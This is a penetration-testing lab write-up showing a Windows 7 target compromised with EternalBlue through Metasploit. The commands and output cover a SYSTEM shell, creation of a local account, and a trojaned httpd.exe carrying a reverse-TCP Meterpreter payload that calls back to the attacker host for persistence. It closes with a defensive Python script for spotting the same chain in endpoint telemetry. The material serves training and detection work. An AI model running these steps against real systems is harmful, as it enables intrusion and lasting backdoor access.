Exploiting Win7 with EternalBlue
Experiment name: exploiting Win7 with EternalBlue (MS17-010)
Experimenter: xx
Experiment date: 2021.9.24
Experiment goal: attack the target server through a known vulnerability and obtain a shell
Experiment environment:
kali: 172.16.12.30
win7 target: 172.16.12.4, username: administrator, password: vgrant
Experiment steps:
Configure the target's firewall: set the relevant "block port" security policy to Disabled, so that SMB (445/tcp) on the target is reachable from kali; the scan and the exploit both need it.
List the MS17-010 modules and use the module at index 3 to scan the target. The index numbers below are positions in this particular search output and change between Metasploit versions; when reproducing, use the full module path (for example use auxiliary/scanner/smb/smb_ms17_010) rather than the index.
msf6 > search ms17-010
msf6 > use 3
Show the module options, set the target IP and run. No vulnerability is reported, because auxiliary/admin/smb/ms17_010_command is not a check module: it is the named-pipe (EternalRomance/EternalSynergy/EternalChampion) command-execution module and needs an accessible named pipe on the target.
msf6 auxiliary(admin/smb/ms17_010_command) > show options
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 auxiliary(admin/smb/ms17_010_command) > run
Switch to the module at index 4 (auxiliary/scanner/smb/smb_ms17_010), set the target host and scan: the vulnerability is found.
msf6 > search ms17-010
msf6 > use 4
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
Find the exploit module and use it:
msf6 > search ms17-010
msf6 > use 0
Show the module options, set the target IP and run:
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
Exploitation succeeded. The session runs as NT AUTHORITY\SYSTEM because the payload is injected into a SYSTEM process on the target:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd
C:\Windows\system32
Attacking the target machine
Capture the screen
Create an account
meterpreter > shell # drop into the target's shell
C:\Windows\system32>net user # list the existing accounts
Create the account cuiyi:
C:\Windows\system32>net user cuiyi /add
創建后門
meterpreter > ps -S httpd.exe
meterpreter > kill 3212 # kill the running httpd.exe first; after the download, background the session
meterpreter > download c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
制作后門文件
msf6 exploit(windows/smb/ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.16.12.30
lhost => 172.16.12.30
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -p windows -x /root/desktop/httpd.exe -k -f exe -o /root/httpd_door.exe
[*] Writing 29184 bytes to /root/httpd_door.exe...
Start a listener for the backdoor's reverse connection and background it with exploit -j (run -j is equivalent):
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set lhost 172.16.12.30
lhost => 172.16.12.30
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.12.30:4444
切回之前保存后臺的會話,上傳后門文件并重命名
msf6 exploit(multi/handler) > sessions
Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ METASPLOITABLE3  172.16.12.30:4444 -> 172.16.12.4:49609 (172.16.12.4)
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > pwd
c:\wamp\bin\apache\apache2.2.21\bin
meterpreter > mv httpd.exe httpd.exe.bak
meterpreter > upload /root/httpd_door.exe
[*] uploading : /root/httpd_door.exe -> httpd_door.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd_door.exe -> httpd_door.exe
[*] uploaded : /root/httpd_door.exe -> httpd_door.exe
meterpreter > mv httpd_door.exe httpd.exe
Restart the wampapache service; once the server is back up, the handler receives a new session (last line of the output).
exploit/multi/handler stays listening, so every time the remote "httpd.exe" is restarted, a new session is opened here.
Restart wampapache
Back on kali, the connection is established successfully.
Summary
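Each step of the chain above (cmd.exe started from the SYSTEM session, net user cuiyi /add, httpd.exe replaced by the generated file, and the reverse connection back to 172.16.12.30:4444) leaves endpoint telemetry a blue team can key on. The following Python is an added example, not part of the original lab, showing hunting rules over Sysmon/EDR-style process, file and network events. It assumes events already parsed into dicts with the fields shown (the sample events are constructed to mirror this lab, not captured logs), a SHA-256 baseline of the legitimate httpd.exe taken before deployment (a placeholder hash here), and that the payload runs under spoolsv.exe, which is the Metasploit EternalBlue module's default injection target (its ProcessName option).

```python
"""Hunt for the post-exploitation chain of this lab in endpoint telemetry.

Added example (not from the original write-up). Input events are
Sysmon/EDR-style dicts: process create, file write and network connect.
SAMPLE_EVENTS below are constructed to mirror the lab, not real logs.
"""
import hashlib
import re
from pathlib import PureWindowsPath

# Processes the MS17-010 kernel shellcode lands in; Metasploit's EternalBlue
# module injects into spoolsv.exe by default (its ProcessName option).
INJECT_TARGETS = {"spoolsv.exe", "lsass.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
# The service binary the lab trojans. BASELINE_SHA256 is assumed to come from
# a baseline taken before deployment; here it is a constructed stand-in.
APACHE_BIN = r"c:\wamp\bin\apache\apache2.2.21\bin\httpd.exe"
BASELINE_SHA256 = hashlib.sha256(b"stand-in for the legitimate httpd.exe").hexdigest()
# Matches "net user X /add", "net1 user ...", "net localgroup administrators X /add"
ACCOUNT_CHANGE = re.compile(r"\bnet1?(?:\.exe)?\s+(?:user|localgroup)\s+.*?/add\b", re.I)


def basename(path):
    return PureWindowsPath(path).name.lower()


def ancestry(pid, by_pid):
    """Image basenames from pid up through ppid links, as far as we have events."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def hunt(events):
    """Return (rule, detail) alerts for the four steps of the lab's attack chain."""
    alerts = []
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    for e in events:
        if e["type"] == "process":
            img, parent = basename(e["image"]), basename(e["parent_image"])
            # 1. `meterpreter > shell` starts cmd.exe under the injected SYSTEM process.
            if img in SHELLS and parent in INJECT_TARGETS:
                alerts.append(("shell_from_injected_process",
                               f"{parent} (pid {e['ppid']}) -> {img} (pid {e['pid']})"))
            # 2. `net user cuiyi /add`; severity rises if an injected process is an ancestor.
            if ACCOUNT_CHANGE.search(e["cmdline"]):
                chain = ancestry(e["pid"], by_pid)
                sev = "high" if INJECT_TARGETS & set(chain) else "medium"
                alerts.append(("local_account_change",
                               f"{sev}: {e['cmdline']!r} via {' <- '.join(chain)}"))
        elif e["type"] == "file":
            # 3. httpd.exe replaced by the generated httpd_door.exe: hash drifts from baseline.
            if e["path"].lower() == APACHE_BIN and e["sha256"] != BASELINE_SHA256:
                alerts.append(("service_binary_replaced",
                               f"{e['path']} sha256={e['sha256'][:16]}..."))
        elif e["type"] == "network":
            # 4. The web server binary should never *initiate* TCP connections;
            #    the reverse_tcp stager does, to LHOST:4444.
            if basename(e["image"]) == "httpd.exe" and e["initiated"]:
                alerts.append(("web_server_outbound",
                               f"httpd.exe (pid {e['pid']}) -> {e['dst_ip']}:{e['dst_port']}"))
    return alerts


SYSTEM = "NT AUTHORITY\\SYSTEM"
SAMPLE_EVENTS = [  # constructed to mirror the lab; not captured logs
    {"type": "process", "pid": 1200, "ppid": 500, "image": r"C:\Windows\System32\spoolsv.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "cmdline": "spoolsv.exe", "user": SYSTEM},
    {"type": "process", "pid": 3300, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\System32\spoolsv.exe", "cmdline": "cmd.exe", "user": SYSTEM},
    {"type": "process", "pid": 3310, "ppid": 3300, "image": r"C:\Windows\System32\net.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "net user cuiyi /add", "user": SYSTEM},
    {"type": "file", "path": APACHE_BIN,
     "sha256": hashlib.sha256(b"stand-in for httpd_door.exe").hexdigest()},
    {"type": "network", "pid": 4100, "image": APACHE_BIN, "initiated": True,
     "dst_ip": "172.16.12.30", "dst_port": 4444},
    # Benign noise: an interactive cmd.exe under explorer.exe must not alert.
    {"type": "process", "pid": 2000, "ppid": 1800, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe", "user": "WIN7\\administrator"},
]

if __name__ == "__main__":
    for rule, detail in hunt(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Running the script on the constructed events yields one alert per step of the lab; the interactive cmd.exe under explorer.exe produces nothing. The parent/ancestry rule is the most robust of the four, since it does not depend on the file name or port the attacker chose, while the hash rule only works if a baseline of the service binary exists before the incident.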